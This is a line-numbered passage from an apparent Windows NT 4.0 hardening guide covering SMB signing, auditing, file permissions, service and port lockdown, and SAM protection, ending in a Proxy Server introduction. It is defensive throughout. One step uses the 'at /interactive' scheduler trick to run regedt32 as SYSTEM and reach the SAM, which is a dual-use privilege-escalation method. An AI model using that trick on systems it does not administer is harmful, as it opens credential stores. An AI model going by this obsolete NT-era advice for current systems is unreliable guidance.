3040in. Shares on NTFS enforce the security on the underlying directory it maps to and it is
3041recommended that proper security be put via NTFS and not via the file sharing service.
3042
3043Also note that the share information resides in the registry which also needs to be protected as
3044explained in a section earlier.
3045
3046? Service Pack 3 for Windows NT version 4.0 includes several enhancements to SMB based
3047file sharing protocol. These are:It supports mutual authentication to counter man-in-the-
3048middle attacks.
3049? It supports message authentication to prevent active message attacks.
3050
3051These are provided by incorporating message signing into SMB packets which are verified by
3052both server and client ends. There are registry key settings to enable SMB signatures on each
3053side. To ensure that SMB server responds to clients with message signing only, configure the
3054following key value:
3055
3056Hive: HKEY_LOCAL_MACHINE\SYSTEM
3057Key: System\CurrentControlSet\Services\LanManServer\Parameters
3058Name: RequireSecuritySignature
3059Type: REG_DWORD
3060Value: 1
3061
3062Setting this value ensures that the Server communicates with only those clients that are aware of
3063message signing. Note that this means that installations that have multiple versions of client
3064software, older versions will fail to connect to servers that have this key value configured.
3065
3066Similarly, security conscious clients can also decide to communicate with servers that support
3067message signing and no one else.
3068
3069Hive: HKEY_LOCAL_MACHINE\SYSTEM
3070Key: System\CurrentControlSet\Services\Rdr\Parameters
3071Name: RequireSecuritySignature
3072Type: REG_DWORD
3073Value: 1
3074
3075Note that setting this key value implies that the client will not be able to connect to servers which
3076do not have message signing support.
3077
3078Please refer to Knowledge Base article Q161372 for further details on SMB message signing
3079enhancements.
3080
3081Windows NT version 4.0 Service Pack 3 also includes another enhancement to SMB file sharing
3082protocol such that by default you are unable to connect to SMB servers (such as Samba or
3083Hewlett-Packard (HP) LM/X or LAN Manager for UNIX) with an unencrypted (plain text)
3084password. This protects from sending clear text forms of passwords over the wire. Please refer
3085to Knowledge base article Q166730 if you have any reasons to allow clients to send unencrypted
3086passwords over the wire.
3087
3088Additionally, customers may want to delete the administrative shares ($ shares) if they are not
3089needed on an installation. This can be accomplished using "net share" command. For example:
3090C:\> net share admin$ /d
3091
3092[6.2.6] Auditing
3093Auditing can inform you of actions that could pose a security risk and also identify the user
3094accounts from which audited actions were taken. Note that auditing only tells you what user
3095accounts were used for the audited events. If passwords are adequately protected, this in turn
3096indicates which user attempted the audited events. However, if a password has been stolen or if
3097actions were taken while a user was logged on but away from the computer, the action could
3098have been initiated by someone other than the person to whom the user account is assigned
3099When you establish an audit policy you'll need to weigh the cost (in disk space and CPU cycles)
3100of the various auditing options against the advantages of these options. You'll want to at least
3101audit failed log on attempts, attempts to access sensitive data, and changes to security settings.
3102Here are some common security threats and the type of auditing that can help track them:
3103
3104[6.2.7] Threat Action
3105Hacker-type break-in using random passwords Enable failure auditing for log on and log off
3106events.
3107Break-in using stolen password Enable success auditing for log on and log off events. The log
3108entries will not distinguish between the real users and the phony ones. What you are looking for
3109here is unusual activity on user accounts, such as log ons at odd hours or on days when you
3110would not expect any activity.
3111Misuse of administrative privileges by authorized users Enable success auditing for use of user
3112rights; for user and group management, for security policy changes; and for restart, shutdown,
3113and system events. (Note: Because of the high volume of events that would be recorded,
3114Windows NT does not normally audit the use of the Backup Files And Directories and the Restore
3115Files And Directories rights. Appendix B, "Security In a Software Development Environment,"
3116explains how to enable auditing of the use of these rights.)
3117Virus outbreak Enable success and failure write access auditing for program files such as files
3118with .exe and .dll extensions. Enable success and failure process tracking auditing. Run suspect
3119programs and examine the security log for unexpected attempts to modify program files or
3120creation of unexpected processes. Note that these auditing settings generate a large number of
3121event records during routine system use. You should use them only when you are actively
3122monitoring the system log.
3123Improper access to sensitive files Enable success and failure auditing for file- and object-
3124access events, and then use File Manager to enable success and failure auditing of read and
3125write access by suspect users or groups for sensitive files.
3126Improper access to printers Enable success and failure auditing for file- and object-access
3127events, and then use Print Manager to enable success and failure auditing of print access by
3128suspect users or groups for the printers.
3129
3130[6.2.8] Enabling System Auditing
3131 Completed Not implemented Not applicable
3132STATUS
3133
3134Enabling system auditing can inform you of actions that pose security risks and possibly detect
3135security breaches.
3136To activate security event logging, follow these steps:
31371. Log on as the administrator of the local workstation.
31382. Click the Start button, point to Programs, point to Administrative Tools, and then click User
3139Manager.
31403. On the Policies menu, click Audit.
31414. Click the Audit These Events option.
31425. Enable the options you want to use. The following options are available:
3143• Log on/Log off: Logs both local and remote resource logins.
3144• File and Object Access: File, directory, and printer access.
3145• Note: Files and folders must reside on an NTFS partition for security logging to be
3146enabled. Once the auditing of file and object access has been enabled, use Windows
3147NT Explorer to select auditing for individual files and folders.
3148• User and Group Management: Any user accounts or groups created, changed, or
3149deleted. Any user accounts that are renamed, disabled, or enabled. Any passwords set
3150or changed.
3151• Security Policy Changes: Any changes to user rights or audit policies.
3152• Restart, Shutdown, And System: Logs shutdowns and restarts for the local workstation.
3153• Process Tracking: Tracks program activation, handle duplication, indirect object
3154access, and process exit.
31556. Click the Success check box to enable logging for successful operations, and the Failure
3156check box to enable logging for unsuccessful operations.
31577.Click OK.
3158
3159Note that Auditing is a "detection" capability rather than "prevention" capability. It will help you
3160discover security breaches after they occur and therefore should always be consider in addition to
3161various preventive measures.
3162
3163[6.2.9] Auditing Base Objects
3164 Completed Not implemented Not applicable
3165STATUS
3166
3167To enable auditing on base system objects, add the following key value to the registry key
3168
3169Hive: HKEY_LOCAL_MACHINE\SYSTEM
3170Key: System\CurrentControlSet\Control\Lsa
3171Name: AuditBaseObjects
3172Type: REG_DWORD
3173Value: 1
3174
3175Note that simply setting this key does not start generating audits. The administrator will need to
3176turn auditing on for the "Object Access" category using User Manager. This registry key setting
3177tells Local Security Authority that base objects should be created with a default system audit
3178control list.
3179
3180[6.3.0] Auditing of Privileges
3181 Completed Not implemented Not applicable
3182STATUS
3183
3184Certain privileges in the system are not audited by default even when auditing on privilege use is
3185turned on. This is done to control the growth of audit logs. The privileges are:
31861. Bypass traverse checking (given to everyone).
31872. Debug programs (given only to administrators)
31883. Create a token object (given to no one)
31894. Replace process level token (given to no one)
31905. Generate Security Audits (given to no one)
31916. Backup files and directories (given to administrators and backup operators)
31927. Restore files and directories (given to administrators and backup operators)
3193
31941 is granted to everyone so is meaningless from auditing perspective. 2 is not used in a working
3195system and can be removed from administrators group. 3, 4 and 5 are not granted to any user or
3196group and are highly sensitive privileges and should not be granted to anyone. However 6 and 7
3197are used during normal system operations and are expected to be used. To enable auditing of
3198these privileges, add the following key value to the registry key
3199
3200Hive: HKEY_LOCAL_MACHINE\SYSTEM
3201Key: System\CurrentControlSet\Control\Lsa
3202Name: FullPrivilegeAuditing
3203Type: REG_BINARY
3204Value: 1
3205
3206Note that these privileges are not audited by default because backup and restore is a frequent
3207operation and this privilege is checked for every file and directory backed or restored, which can
3208lead to thousands of audits filling up the audit log in no time. Carefully consider turning on
3209auditing on these privilege uses.
3210
3211
3212
3213
3214[6.3.1] Protecting Files and Directories
3215 Completed Not implemented Not applicable
3216STATUS
3217
3218The NTFS file system provides more security features than the FAT system and should be used
3219whenever security is a concern. The only reason to use FAT is for the boot partition of an ARC-
3220compliant RISC system. A system partition using FAT can be secured in its entirety using the
3221Secure System Partition command on the Partition menu of the Disk Administrator utility.
3222
3223Among the files and directories to be protected are those that make up the operating system
3224software itself. The standard set of permissions on system files and directories provide a
3225reasonable degree of security without interfering with the computer's usability. For high-level
3226security installations, however, you might want to additionally set directory permissions to all
3227subdirectories and existing files, as shown in the following list, immediately after WindowsNT is
3228installed. Be sure to apply permissions to parent directories before applying permissions to
3229subdirectories.
3230
3231First apply the following using the ACL editor:
3232
3233Directory Permissions Complete
3234\WINNT and all subdirectories under it. Administrators: Full Control
3235CREATOR OWNER: Full Control
3236Everyone: Read
3237SYSTEM: Full Control
3238
3239Now, within the \WINNT tree, apply the following exceptions to the general security:
3240
3241Directory Permissions Complete
3242\WINNT\REPAIR Administrators: Full Control
3243\WINNT\SYSTEM32\CONFIG Administrators: Full Control
3244CREATOR OWNER: Full Control
3245Everyone: List
3246SYSTEM: Full Control
3247\WINNT\SYSTEM32\SPOOL Administrators: Full Control
3248CREATOR OWNER: Full Control
3249Everyone: Read
3250Power Users: Change
3251SYSTEM: Full Control
3252\WINNT\COOKIES
3253\WINNT\FORMS
3254\WINNT\HISTORY
3255\WINNT\OCCACHE
3256\WINNT\PROFILES
3257\WINNT\SENDTO
3258\WINNT\Temporary Internet Files Administrators: Full Control
3259CREATOR OWNER: Full Control
3260Everyone: Special Directory Access – Read, Write and Execute, Special File Access – None
3261System : Full Control
3262
3263Several critical operating system files exist in the root directory of the system partition on Intel
326480486 and Pentium-based systems. In high-security installations you might want to assign the
3265following permissions to these files:
3266
3267File C2-Level Permissions Complete
3268\Boot.ini, \Ntdetect.com, \Ntldr Administrators: Full Control
3269SYSTEM: Full Control
3270\Autoexec.bat, \Config.sys Everybody: Read
3271Administrators: Full Control
3272SYSTEM: Full Control
3273\TEMP directory Administrators: Full Control
3274SYSTEM: Full Control
3275CREATOR OWNER: Full Control
3276Everyone: Special Directory Access – Read, Write and Execute, Special File Access – None
3277
3278
3279To view these files in File Manager, choose the By File Type command from the View menu,
3280then select the Show Hidden/System Files check box in the By File Type dialog box.
3281
3282Note that the protections mentioned here are over and above those mentioned earlier in the
3283standard security level section, which included having only NTFS partitions (except the boot
3284partition in case of RISC machines). The FAT boot partition for RISC systems can be configured
3285using the Secure System Partition command on the Partition menu of the Disk Administrator
3286utility.
3287
3288It is also highly advisable that Administrators manually scan the permissions on various partitions
3289on the system and ensures that they are appropriately secured for various user accesses in their
3290environment.
3291
3292[6.3.2] Services and NetBIOS Access From Internet
3293For a stand-alone WEB or firewall server, consider the following guidelines
3294
3295The following services should NOT be started:
3296
3297Service Installed Not Installed
3298Alerter
3299ClipBook Server
3300Computer Browser
3301DHCP Client
3302Directory Replicator
3303Messenger
3304Net Logon
3305Network DDE
3306Network DDE DSDM
3307Plug and Play
3308Remote Procedure Call (RPC) Locator
3309Server
3310SNMP Trap Service
3311Spooler "unless print spooling is needed"
3312TCP/IP NetBIOS Helper
3313Telephony Service
3314Workstation
3315
3316The following services MUST be started:
3317
3318Service Installed Not Installed
3319EventLog
3320FTP Publishing Service (for FTP server)
3321Gopher Publishing Service (for Gopher server)
3322NT LM Security Support Provider
3323Remote Procedure Call (RPC) Service
3324SNMP
3325World Wide Web Publishing Service (for WWW server)
3326
3327The following services MAY be started if needed:
3328
3329Service Installed Not Installed
3330Schedule
3331UPS
3332
3333Disconnect the "NetBIOS Interface", the "Server" and the "Workstation" from the "WINS
3334Client(TCP/IP)"
3335
3336[6.3.3] Alerter and Messenger Services
3337
3338The Windows NT alerter and messenger services enable a user to send pop-up messages to
3339other users. A network administrator may consider this an unnecessary risk due to the fact that
3340these types of services have been known to be used in social engineering attacks. Some users
3341might actually respond to a request to change their password, create a share, or otherwise open
3342holes in the network. A side effect of running this service is that it causes the name of the current
3343user to be broadcast in the NetBIOS name table, which gives the attacker a valid user name to
3344use in brute force attempts.
3345
3346[6.3.4] Unbind Unnecessary Services from Your Internet Adapter Cards
3347
3348 Completed Not implemented Not applicable
3349STATUS
3350
3351Use the Bindings feature in the Network application in Control Panel to unbind any unnecessary
3352services from any network adapter cards connected to the Internet. For example, you might use
3353the Server service to copy new images and documents from computers in your internal network,
3354but you might not want remote users to have direct access to the Server service from the Internet.
3355
3356If you need to use the Server service on your private network, disable the Server service binding
3357to any network adapter cards connected to the Internet. You can use the Windows NT Server
3358service over the Internet; however, you should fully understand the security implications and
3359comply with Windows NT Server Licensing requirements issues.
3360
3361When you are using the Windows NT Server service you are using Microsoft networking (the
3362server message block [SMB] protocol rather than the HTTP protocol) and all Windows NT Server
3363Licensing requirements still apply. HTTP connections do not apply to Windows NT Server
3364licensing requirements.
3365
3366For Windows NT systems with direct Internet connectivity and have NetBios, there are two
3367configuration options:
3368• Configure the NT system on the Internet outside the corporate firewall. You can also
3369accomplish this by blocking ports 135, 137 and 138 on TCP and UDP protocols at the
3370firewall. This ensures that no NetBIOS traffic moves across the corporate firewall.
3371• Configure the protocol bindings between TCP/IP, NetBIOS, Server and Workstation
3372services using the network control panel. By removing the bindings between NetBIOS and
3373TCP/IP, the native file sharing services (using the Server and Workstation services) will not
3374be accessible via TCP/IP and hence the Internet. These and other NetBIOS services will
3375still be accessible via a local LAN-specific, non-routable protocol (ex: NetBEUI) if one is in
3376place. To accomplish this use the Network Control Panel applet. Select the Bindings Tab
3377and disable the NetBios bindings with TCP/IP protocol stack.
3378
3379A Windows NT system with direct Internet connectivity needs to be secured with respect to other
3380services besides NetBIOS access, specifically Internet Information Server
3381
3382NetBIOS over TCP/IP should normally be disabled for a firewall or web server. The following is a
3383list of the ports used by NBT.
3384? NetBIOS-ns 137/tcp NETBIOS Name Service
3385? NetBIOS-ns 137/udp NETBIOS Name Service
3386? NetBIOS-dgm 138/tcp NETBIOS Datagram Service
3387? NetBIOS-dgm 138/udp NETBIOS Datagram Service
3388? NetBIOS-ssn 139/tcp NETBIOS Session Service
3389? NetBIOS-ssn 139/udp NETBIOS Session Service
3390
3391[6.3.5] Enhanced Protection for Security Accounts Manager Database
3392
3393 Completed Not implemented Not applicable
3394STATUS
3395
3396The Windows NT Server 4.0 System Key hotfix (included in Service Pack 3) provides the
3397capability to use strong encryption techniques to increase protection of account password
3398information stored in the registry by the Security Account Manager (SAM). Windows NT Server
3399stores user account information, including a derivative of the user account password, in a secure
3400portion of the Registry protected by access control and an obfuscation function. The account
3401information in the Registry is only accessible to members of the Administrators group. Windows
3402NT Server, like other operating systems, allows privileged users who are administrators access to
3403all resources in the system. For installations that want enhanced security, strong encryption of
3404account password derivative information provides an additional level of security to prevent
3405Administrators from intentionally or unintentionally accessing password derivatives using Registry
3406programming interfaces.
3407
3408Please refer to Knowledge Base article Q143475 for more details on SysKey feature and how it
3409can be implemented on a Windows NT installation.
3410
3411[6.3.6] Disable Caching of Logon Credentials during interactive logon.
3412
3413 Completed Not implemented Not applicable
3414STATUS
3415
3416The default configuration of Windows NT caches the last logon credentials for a user who logged
3417on interactively to a system. This feature is provided for system availability reasons such as the
3418user's machine is disconnected or none of the domain controllers are online.
3419
3420Even though the credential cache is well protected, in a highly secure environments, customers
3421may want to disable this feature. This can be done by setting the following registry key:
3422
3423Hive: HKEY_LOCAL_MACHINE
3424Key: Software\Microsoft\Windows NT\CurrentVersion\Winlogon
3425Name: CachedLogonsCount
3426Type: REG_DWORD
3427Value: 0
3428
3429
3430[6.3.7] How to secure the %systemroot%\repair\sam._ file
3431
3432 Completed Not implemented Not applicable
3433STATUS
3434
3435By default, the SAM._ file and \repair directory has the following permissions;
3436
3437Administrators: Full Control
3438Everyone: Read
3439SYSTEM: Full Control
3440Power Users: Change
3441
34421.From within Explorer, highlight the SAM._ file, right click, choose properties, security,
3443permissions. Remove all privilege from this file.
34442.From a DOS prompt, execute the following;
3445
3446cacls %systemroot%\repair\sam._ /D Everyone
3447
3448This will deny the group Everyone permission to the file, ensuring that no other permission (i.e.
3449inherited permissions from a share) can override the file permission.
34503.Whenever you need to update your ERD, first execute the following from a DOS prompt;
3451
3452cacls %systemroot%\repair\sam._ /T /G Administrators:C
3453
3454This will grant Administrators change permission to update it during the ERD update.
3455
34564.Once the ERD has been updated, execute the following from a DOS prompt;
3457
3458cacls %systemroot%\repair\sam._ /E /R Administrators
3459
3460This will once again remove the permissions for Administrator
3461
3462How to enable auditing on password registry keys
3463
34641.First you have to make sure auditing is enabled. Start User Manager, Policies, Audit, and click
3465"Audit These Events".
34662.By default, Windows NT does not identify any users or groups to audit on any objects within the
3467system. Auditing can add performance overhead to your system depending on the available
3468resources, so care should be taken in determining what and whom to audit. For a full
3469description of auditing in Windows NT, I recommend the Microsoft Press book "Windows NT
34703.5 - Guidelines for Security, Audit, and Control", ISBN 1-55615-814-9. Despite its title it is
3471still the most comprehensive coverage of auditing that I have read. For the sake of this
3472example, we will simply check every Success and Failure checkbox.
34733.Close the dialog.
34744.Now for a little known trick. While logged on as Administrator, ensure that the Schedule service
3475is set to start up as the System account. Once set, start the Schedule service.
34765.Check the time, and then open a DOS prompt. At the DOS prompt, type in the following; at
347722:48 /interactive "regedt32.exe" where 22:48 gets replaced with the current time plus 1
3478minute (or 2 or whatever amount of time you think it will take you to type in the command).
34796.At the designated time, regedt32.exe will fire up and appear on your desktop. This incarnation
3480of regedt32.exe will be running in the security context of the user SYSTEM. As such, you will
3481be able to see the entire registry, every key within the SAM or Security trees. BE VERY
3482CAREFUL HERE. It is important to note that when running an application as SYSTEM, it
3483does so attempting to use null session for credentials. Null session support has been
3484disabled by default in all versions of Windows NT after 3.1, therefore any attempt to connect
3485to non-local resources as this security context will fail. An Administrator could enable null
3486session support through the registry, but such a configuration is strongly discouraged.
34877.All we want to do is enable auditing on the designated keys, nothing else. To this end, we
3488highlight the HKEY_LOCAL_MACHINE windows within regedt32. Next highlight the SAM
3489tree. Choose the Security menu item, then Auditing.
34908.Click on the Add button and choose Show Users.
34919.I'm going to recommend that you add the SYSTEM user, the group Domain Admins, and the
3492user Administrator. You want to cover any account which has the right to;
3493? "Take ownership of files or other objects"
3494? "Back up files and directories"
3495? "Manage auditing and security log"
3496? "Restore files and directories"
3497? "Add workstations to domain"
3498? "Replace a process level token"
349910.Click the Audit Permission on Existing Subkeys
350011.Next, click in the Success and Failure checkboxes for the following entries; - Query Value -
3501Set Value - Write DAC - Read Control
350212.Choose OK, and then Yes.
350313.Repeat the process for the Security tree.
350414.Close REGEDT32, and stop the Schedule service. You will want to set the Schedule service
3505to use a userID for startup which you create, rather than SYSTEM, in future. Take this
3506opportunity to create such a user and change the startup for Schedule.
3507
3508You will now have applied auditing to the entire SAM ensuring you'll be notified via the Event
3509Logger of any failed or successful access to your sensitive information by the only accounts
3510which have the ability to access such information. The issue of what to do when/if you discover
3511event notifications is beyond the scope of this document. Part of a good security policy is an
3512appropriate audit policy which would dictate how the event logs are reviewed, how the information
3513is verified, and what actions should be taken for each possible event.
3514
3515[6.3.8] TCP/IP Security in NT
3516
3517Note: This section is not meant to teach you the concepts behind the TCP/IP protocol. It is
3518assumed that a working knowledge of TCP/IP can be applied.
3519
3520 Windows NT has a built in TCP/IP security functionality that most people do not use or
3521know about. This functionality enables you to control the types of network traffic that can reach
3522your NT servers. Access can be allowed or denied based on specific TCP ports, UDP ports, and
3523IP protocols. This type of security is normally applied to servers connected directly to the internet,
3524which is not recommended.
3525 Do configure NT's built in TCP/IP security, follow these steps:
3526
3527 1 - Right click on Network Neighborhood and goto the properties option.
3528 2 - Select the Protocols tab, highlight TCP/IP and click on Properties.
3529 3 - Select the IP address tab of the TCP/IP properties screen.
3530 4 - Check the check box that reads "Enable Security".
3531 5 - Click on Configure
3532
3533 You should now be looking at the TCP/IP Security dialog, which has the following
3534options:
3535
3536 -Adapter: Specifies which of the installed network adapter cards you are configuring
3537 -TCP Ports
3538 -UDP Ports
3539 -IP Protocols
3540
3541 Within these settings, you would choose which ports and what access permissions you
3542would like to assign to those ports. The following list is a list of the well known TCP/IP ports. This
3543is not an in depth guide, just a quick reference (For more details, check RFC 1060).
3544
3545[6.3.9] Well known TCP/UDP Port numbers
3546
3547 Service Port Comments
3548
3549 TCP Ports
3550 echo 7/tcp
3551 discard 9/tcp sink null
3552 systat 11/tcp users
3553 daytime 13/tcp
3554 netstat 15/tcp
3555 qotd 17/tcp quote
3556 chargen 19/tcp ttytst source
3557 ftp-data 20/tcp
3558 ftp 21/tcp
3559 telnet 23/tcp
3560 smtp 25/tcp mail
3561 time 37/tcp timserver
3562 name 42/tcp nameserver
3563 whois 43/tcp nicname
3564 nameserver 53/tcp domain
3565 apts 57/tcp any private terminal service
3566 apfs 59/tcp any private file service
3567 rje 77/tcp netrjs
3568 finger 79/tcp
3569 http 80/tcp
3570 link 87/tcp ttylink
3571 supdup 95/tcp
3572 newacct 100/tcp [unauthorized use]
3573 hostnames 101/tcp hostname
3574 iso-tsap 102/tcp tsap
3575 x400 103/tcp
3576 x400-snd 104/tcp
3577 csnet-ns 105/tcp CSNET Name Service
3578 pop-2 109/tcp Post Office Protocol version 2
3579 pop-3 110/tcp Post Office Protocol version 3
3580 sunrpc 111/tcp
3581 auth 113/tcp authentication
3582 sftp 115/tcp
3583 uucp-path 117/tcp
3584 nntp 119/tcp usenet readnews untp
3585 ntp 123/tcp network time protocol
3586 statsrv 133/tcp
3587 profile 136/tcp
3588 NeWS 144/tcp news
3589 print-srv 170/tcp
3590 https 443/tcp Secure HTTP
3591 exec 512/tcp remote process execution;
3592 authentication performed using
3593 passwords and UNIX loppgin names
3594 login 513/tcp remote login a la telnet;
3595 automatic authentication performed
3596 based on priviledged port numbers
3597 and distributed data bases which
3598 identify "authentication domains"
3599 cmd 514/tcp like exec, but automatic
3600 authentication is performed as for
3601 login server
3602 printer 515/tcp spooler
3603 efs 520/tcp extended file name server
3604 tempo 526/tcp newdate
3605 courier 530/tcp rpc
3606 conference 531/tcp chat
3607 netnews 532/tcp readnews
3608 uucp 540/tcp uucpd
3609 klogin 543/tcp
3610 kshell 544/tcp krcmd
3611 dsf 555/tcp
3612 remotefs 556/tcp rfs server
3613 chshell 562/tcp chcmd
3614 meter 570/tcp demon
3615 pcserver 600/tcp Sun IPC server
3616 nqs 607/tcp nqs
3617 mdqs 666/tcp
3618 rfile 750/tcp
3619 pump 751/tcp
3620 qrh 752/tcp
3621 rrh 753/tcp
3622 tell 754/tcp send
3623 nlogin 758/tcp
3624 con 759/tcp
3625 ns 760/tcp
3626 rxe 761/tcp
3627 quotad 762/tcp
3628 cycleserv 763/tcp
3629 omserv 764/tcp
3630 webster 765/tcp
3631 phonebook 767/tcp phone
3632 vid 769/tcp
3633 rtip 771/tcp
3634 cycleserv2 772/tcp
3635 submit 773/tcp
3636 rpasswd 774/tcp
3637 entomb 775/tcp
3638 wpages 776/tcp
3639 wpgs 780/tcp
3640 mdbs 800/tcp
3641 device 801/tcp
3642 maitrd 997/tcp
3643 busboy 998/tcp
3644 garcon 999/tcp
3645 blackjack 1025/tcp network blackjack
3646 bbn-mmc 1347/tcp multi media conferencing
3647 bbn-mmx 1348/tcp multi media conferencing
3648 orasrv 1525/tcp oracle
3649 ingreslock 1524/tcp
3650 issd 1600/tcp
3651 nkd 1650/tcp
3652 dc 2001/tcp
3653 mailbox 2004/tcp
3654 berknet 2005/tcp
3655 invokator 2006/tcp
3656 dectalk 2007/tcp
3657 conf 2008/tcp
3658 news 2009/tcp
3659 search 2010/tcp
3660 raid-cc 2011/tcp raid
3661 ttyinfo 2012/tcp
3662 raid-am 2013/tcp
3663 troff 2014/tcp
3664 cypress 2015/tcp
3665 cypress-stat 2017/tcp
3666 terminaldb 2018/tcp
3667 whosockami 2019/tcp
3668 servexec 2021/tcp
3669 down 2022/tcp
3670 ellpack 2025/tcp
3671 shadowserver 2027/tcp
3672 submitserver 2028/tcp
3673 device2 2030/tcp
3674 blackboard 2032/tcp
3675 glogger 2033/tcp
3676 scoremgr 2034/tcp
3677 imsldoc 2035/tcp
3678 objectmanager 2038/tcp
3679 lam 2040/tcp
3680 interbase 2041/tcp
3681 isis 2042/tcp
3682 rimsl 2044/tcp
3683 dls 2047/tcp
3684 dls-monitor 2048/tcp
3685 shilp 2049/tcp
3686 NSWS 3049/tcp
3687 rfa 4672/tcp remote file access server
3688 complexmain 5000/tcp
3689 complexlink 5001/tcp
3690 padl2sim 5236/tcp
3691 man 9535/tcp
3692
3693
3694 UDP Ports
3695 echo 7/udp
3696 discard 9/udp sink null
3697 systat 11/udp users
3698 daytime 13/udp
3699 netstat 15/udp
3700 qotd 17/udp quote
3701 chargen 19/udp ttytst source
3702 time 37/udp timserver
3703 rlp 39/udp resource
3704 name 42/udp nameserver
3705 whois 43/udp nicname
3706 nameserver 53/udp domain
3707 bootps 67/udp bootp
3708 bootpc 68/udp
3709 tftp 69/udp
3710 sunrpc 111/udp
3711 erpc 121/udp
3712 ntp 123/udp
3713 statsrv 133/udp
3714 profile 136/udp
3715 snmp 161/udp
3716 snmp-trap 162/udp
3717 at-rtmp 201/udp
3718 at-nbp 202/udp
3719 at-3 203/udp
3720 at-echo 204/udp
3721 at-5 205/udp
3722 at-zis 206/udp
3723 at-7 207/udp
3724 at-8 208/udp
3725 biff 512/udp used by mail system to notify users
3726 of new mail received; currently
3727 receives messages only from
3728 processes on the same machine
3729 who 513/udp maintains data bases showing who's
3730 logged in to machines on a local
3731 net and the load average of the
3732 machine
3733 syslog 514/udp
3734 talk 517/udp like tenex link, but across
3735 machine - unfortunately, doesn't
3736 use link protocol (this is actually
3737 just a rendezvous port from which a
3738 tcp connection is established)
3739 ntalk 518/udp
3740 utime 519/udp unixtime
3741 router 520/udp local routing process (on site);
3742 uses variant of Xerox NS routing
3743 information protocol
3744 timed 525/udp timeserver
3745 netwall 533/udp for emergency broadcasts
3746 new-rwho 550/udp new-who
3747 rmonitor 560/udp rmonitord
3748 monitor 561/udp
3749 meter 571/udp udemon
3750 elcsd 704/udp errlog copy/server daemon
3751 loadav 750/udp
3752 vid 769/udp
3753 cadlock 770/udp
3754 notify 773/udp
3755 acmaint_dbd 774/udp
3756 acmaint_trnsd 775/udp
3757 wpages 776/udp
3758 puparp 998/udp
3759 applix 999/udp Applix ac
3760 puprouter 999/udp
3761 cadlock 1000/udp
3762 hermes 1248/udp
3763 wizard 2001/udp curry
3764 globe 2002/udp
3765 emce 2004/udp CCWS mm conf
3766 oracle 2005/udp
3767 raid-cc 2006/udp raid
3768 raid-am 2007/udp
3769 terminaldb 2008/udp
3770 whosockami 2009/udp
3771 pipe_server 2010/udp
3772 servserv 2011/udp
3773 raid-ac 2012/udp
3774 raid-cd 2013/udp
3775 raid-sf 2014/udp
3776 raid-cs 2015/udp
3777 bootserver 2016/udp
3778 bootclient 2017/udp
3779 rellpack 2018/udp
3780 about 2019/udp
3781 xinupagesrver 2020/udp
3782 xinuexpnsion1 2021/udp
3783 xinuexpnsion2 2022/udp
3784 xinuexpnsion3 2023/udp
3785 xinuexpnsion4 2024/udp
3786 xribs 2025/udp
3787 scrabble 2026/udp
3788 isis 2042/udp
3789 isis-bcast 2043/udp
3790 rimsl 2044/udp
3791 cdfunc 2045/udp
3792 sdfunc 2046/udp
3793 dls 2047/udp
3794 shilp 2049/udp
3795 rmontor_scure 5145/udp
3796 xdsxdm 6558/udp
3797 isode-dua 17007/udp
3798
3799[7.0.0] Preface to Microsoft Proxy Server
3800This section was not made for people who have been working with Microsoft Proxy Server since
3801its beta (catapult) days. It is made for individuals who are curious about the product and security
3802professionals that are curious as to what Microsoft Proxy Server has to offer. This section is also
3803being written for individuals have a general idea of what a Proxy Server does, but wants to know
3804more. This section goes into discussion of Proxy Server Features and Architecture, Access
3805Control, Encryption, and Firewall Strategies (which I have been getting a lot of requests for).
3806
3807The second part of the documentation goes into Firewall types and strategies, so if that's the
3808reason you downloaded the documentation, go straight to page 8 I believe.
3809
3810[7.0.1] What is Microsoft Proxy Server?
3811Microsoft Proxy Server is a "firewall" and cache server. It provides additional Internet security and
3812can improve network response issues depending on its configuration. The reason I put the word
3813firewall in quotes is because Proxy Server should not be considered as a stand-alone solution to
3814a firewall need. When you are done reading this document, you will have an advanced
3815understanding of the Proxy Server product and also understand firewall techniques and
3816topologies.
3817
3818Proxy Server can be used as an inexpensive means to connect an entire business through only
3819one valid IP address. It can also be used to allow more secure inbound connections to your
3820internal network from the Internet. By using Proxy Server, you are able to better secure your
3821network against intrusion. It can be configured to allow your entire internal private network to
3822access resources on the Internet, at the same time blocking any inbound access.
3823
3824Proxy Server can also be used to enhance the performance of your network by using advanced
3825caching techniques. The can be configured to save local copies of requested items from the
3826Internet. The next time that item is requested, it can be retrieved from the cache without having to
3827connect to the original source. This can save an enormous amount of time and network
3828bandwidth.
3829
3830Unlike Proxy Server 1.0, Proxy Server 2.0 includes packet filtering and many other features that
3831we will be discussing.
3832
3833Proxy Server provides it functionality by using three services:
3834
3835? Web Proxy: The web proxy service supports HTTP, FTP, and Gopher for TCP/IP Clients.
3836? WinSock Proxy: The Winsock proxy supports Windows Sockets client applications. It
3837provides support for clients running either TCP/IP or IPX/SPX. This allows for networks that
3838may be running more of a Novell environment to still take advantage of Proxy Server.
3839? SOCKS Proxy: The SOCKS Proxy is a cross-platform service that allows for secure
3840communication in a client/server capacity. This service supports SOCKS version 4.3a and
3841allows users access to the Internet by means of Proxy Server. SOCKS extends the
3842functionality provided by the WinSock service to non-Windows platforms such as Unix or
3843Macintosh.
3844
3845[7.0.2] Proxy Servers Security Features
3846
3847In conjunction with other products, Proxy Server can provide firewall level security to prevent
3848access to your internal network.
3849? Single Contact Point: A Proxy Server will have two network interfaces. One of these network
3850interfaces will be connected to the external (or "untrusted") network, the other interface will be
3851connected to your internal (or "trusted") network. This will better secure your LAN from
3852potential intruders.
3853? Protection of internal IP infrastructure: When IP forwarding is disabled on the Proxy Server,
3854the only IP address that will be visible to the external environment will be the IP address of
3855the Proxy Server. This helps in preventing intruders from finding other potential targets on
3856your network.
3857? Packet Layer Filtering: Proxy Server adds dynamic packet filtering to its list of features. With
3858this feature, you can block or enable reception of certain packet types. This enables you to
3859have a tremendous amount of control over your network security.
3860
3861[7.0.3] Beneficial Features of Proxy
3862
3863? IIS and NT Integration: Proxy Server integrates with Windows NT and Internet Information
3864Server tighter than any other package available on the market. Proxy Server actually uses
3865the same administrative interface used by Internet Information Server.
3866? Bandwidth Utilization: Proxy Server allows all clients in your network to share the same link to
3867the external network. In conjunction with Internet Information Server, you can set aside a
3868certain portion of your bandwidth for use by your webserver services.
3869? Caching Mechanisms: Proxy Server supports both active and passive caching. These
3870concepts will be explained in better detail further into the document.
3871? Support for Web Publishing: Proxy Server uses a process known as reverse proxy to provide
3872security while simultaneously allowing your company to publish on the Internet. Using
3873another method known as reverse hosting, you can also support virtual servers through
3874Proxy.
3875
3876[7.0.4] Hardware and Software Requirements
3877
3878Microsoft suggests the following minimum hardware requirements.
3879
